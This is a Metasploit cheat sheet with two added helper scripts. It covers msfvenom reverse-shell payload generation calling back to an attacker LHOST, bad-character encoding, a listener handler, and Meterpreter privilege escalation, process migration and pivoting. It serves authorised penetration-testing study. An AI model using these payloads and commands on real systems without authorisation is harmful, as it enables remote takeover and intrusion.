
Metasploit

Database

Initialize the Metasploit database (creates the PostgreSQL role and the msf database, and writes the connection settings msfconsole reads on startup).

sudo msfdb init

Make sure the PostgreSQL service is running. enable on its own only makes it start at boot; --now also starts it immediately. Verify from the msfconsole prompt with db_status.

sudo systemctl enable --now postgresql

Workspaces

Workspaces keep each engagement's hosts, services and loot in a separate database namespace. -a creates a new workspace and switches to it; plain workspace <workspace_name> switches to an existing one.

workspace -a <workspace_name>

Nmap

db_nmap wraps the Nmap binary and accepts the same options; it stores the results in the Metasploit database so they can be queried later and correlated with output from other modules.

hosts - list discovered hosts and their detected operating system.

services - list discovered services and which host runs them.

Search Module

Metasploit module types:

  • Exploit Modules: Code to exploit vulnerabilities in systems.

  • Payload Modules: Code executed on the target post-exploitation.

  • Auxiliary Modules: Tools for scanning and information gathering.

  • Post Modules: Actions taken on a compromised system.

  • Encoder Modules: Obfuscate payloads to evade detection.

  • Nop Generator Modules: Create NOP sleds for buffer overflows.

  • Evasion Modules: Generate payloads that try to bypass antivirus.

Filter by module type and name, or search by name only:

search type:<module_type> <module_name>
search <module_name>

Meterpreter

System information

Get system info

sysinfo

Get current user

getuid

Network

Forward a local port through the session to a host reachable from the target (connecting to 127.0.0.1:<lport> on the attacking machine reaches <rhost>:<port>):

portfwd add -l <lport> -p <port> -r <rhost>

Add a pivot route so other Metasploit modules reach the subnet through the session. This is an msfconsole command, so background the Meterpreter session first (or run autoroute from inside it):

route add <subnet>/24 <session_id>

More useful commands:

arp # display the target's ARP cache
getproxy # display the current proxy configuration
ifconfig # display network interfaces (ipconfig is an alias)
netstat # display the network connections
resolve # resolve a set of host names on the target

File System

Commands with an l prefix operate on the attacking (local) system instead of the target: lcd changes the local working directory, lcat prints a local file.

lcd <path>
lcat <file>

Meterpreter also adds file transfer commands: download copies a file from the target to the local system, upload goes the other way.

download <target_path> <local_path>
upload <local_path> <target_path>

Channels

channel -l # list open channels
channel -i <channel_id> # interact with a channel

Meterpreter Post Exploitation

Seconds since the last user input on the target; a low value means someone is actively using the machine.

idletime

Attempt to elevate to SYSTEM by automatically trying several named-pipe impersonation and token-duplication techniques (requires local administrator rights).

getsystem

Migrate Meterpreter into another process, e.g. a long-lived one, so the session survives the exploited process exiting.

migrate <dest_pid>

MSFVenom

Payloads

List payloads for the target platform and architecture:

msfvenom -l payloads --platform windows --arch x64

Create executable payloads. Staged payloads have a slash between stager and stage (shell/reverse_tcp) and need a Metasploit handler to deliver the stage; stageless payloads use an underscore (shell_reverse_tcp), are larger, but also work with a plain netcat listener.

 # staged
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<host> LPORT=<port> -f exe -o rev.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<host> LPORT=<port> -f exe -o rev.exe
 # stageless
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe -o rev.exe

Generate shellcode as a PowerShell byte array stored in a variable named sc:

msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f powershell -v sc

Generate encoded shellcode that avoids a list of bad characters (bytes the target input cannot contain, such as null, line feed or carriage return). shikata_ga_nai is an x86 encoder, so it is paired with the x86 payload; EXITFUNC=thread keeps the host process alive when the shell exits:

msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
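Encoding is only worth trusting after checking it. The script below is an added example, not part of the original notes: it parses a msfvenom -f c dump, reports any bad character that survived encoding and counts the bytes so the number can be compared with the "Payload size" line msfvenom prints. The two buffers at the bottom are constructed sample data, not real shellcode.

```shell
#!/usr/bin/env bash
# Added example (not part of the original notes): verify a `msfvenom -f c`
# dump against a bad-character list before it goes into an exploit.
# The sample buffers below are constructed, not real shellcode.

# extract_bytes FILE: print every \xNN escape in FILE, lower-cased, one per line
extract_bytes() {
  grep -oE '\\x[0-9a-fA-F]{2}' "$1" | tr 'A-F' 'a-f'
}

# shellcode_len FILE: number of bytes in the dump (compare with "Payload size")
shellcode_len() {
  extract_bytes "$1" | grep -c . || true
}

# badchars_in FILE BADCHARS
# BADCHARS uses msfvenom -b syntax, e.g. "\x00\x0a\x0d".
# Prints each bad byte that occurs in FILE; returns 1 if any was found, 0 if clean.
badchars_in() {
  local file="$1" bad="$2" rc=0 b
  for b in $(printf '%s' "$bad" | grep -oE '\\x[0-9a-fA-F]{2}' | tr 'A-F' 'a-f'); do
    # fixed-string, whole-line match so "\x00" is not treated as a regex
    if extract_bytes "$file" | grep -qxF -- "$b"; then
      printf '%s\n' "$b"
      rc=1
    fi
  done
  return "$rc"
}

# --- demo with constructed dumps (not real shellcode) ---
demo_dir=$(mktemp -d)
cat > "$demo_dir/dirty.c" <<'EOF'
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50";
EOF
cat > "$demo_dir/clean.c" <<'EOF'
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x41\x51\x41\x50";
EOF
BAD='\x00\x0a\x0d\x25\x26\x2b\x3d'   # same list as the msfvenom -b argument above

for f in dirty.c clean.c; do
  if badchars_in "$demo_dir/$f" "$BAD"; then
    echo "$f: clean, $(shellcode_len "$demo_dir/$f") bytes"
  else
    echo "$f: contains bad characters, do not use"
  fi
done
```

Run it against the real dump by pointing badchars_in at the file msfvenom wrote; a non-zero exit means the encoder did not succeed and the payload needs a different encoder or more iterations (-i).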

Multi Handler

One-liner to start a handler; the payload must match the one given to msfvenom. sudo is only needed when LPORT is below 1024.

sudo msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <LHOST>;set LPORT <LPORT>;run;"
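When several callbacks are expected, a resource script is easier to reuse than the one-liner. The script below is an added example, not from the original notes: it writes a multi/handler resource file that keeps listening after the first session, validates LPORT, and warns when the port needs root. The payload, LHOST and LPORT values in the demo are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): generate a reusable
# multi/handler resource script. Sample payload, LHOST and LPORT are assumptions.

# write_handler_rc PAYLOAD LHOST LPORT OUTFILE
# Returns 1 on an invalid port; otherwise writes OUTFILE and returns 0.
write_handler_rc() {
  local payload="$1" lhost="$2" lport="$3" out="$4"
  case "$lport" in
    ''|*[!0-9]*) echo "LPORT must be numeric" >&2; return 1 ;;
  esac
  if [ "$lport" -lt 1 ] || [ "$lport" -gt 65535 ]; then
    echo "LPORT out of range" >&2; return 1
  fi
  if [ "$lport" -lt 1024 ]; then
    echo "note: LPORT $lport needs root, run msfconsole with sudo" >&2
  fi
  cat > "$out" <<EOF
use exploit/multi/handler
# should match the payload msfvenom was given, or the stage will not be delivered
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
# keep listening after the first session so several callbacks can land
set ExitOnSession false
# -j: run as a background job, -z: do not auto-interact with new sessions
exploit -j -z
EOF
}

# demo with sample values (assumed, not from the notes)
rc_dir=$(mktemp -d)
write_handler_rc windows/x64/meterpreter/reverse_tcp 10.10.14.5 4444 "$rc_dir/handler.rc"
cat "$rc_dir/handler.rc"
echo "start with: msfconsole -q -r $rc_dir/handler.rc"
```

Start the handler with msfconsole -q -r handler.rc; with ExitOnSession false and -j -z it stays up as a job and new sessions appear under sessions -l instead of taking over the console.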

References

  • Metasploit Unleashed - Free Online Ethical Hacking Course (OffSec)
  • Deep Dive Into Stageless Meterpreter Payloads (Rapid7 Blog)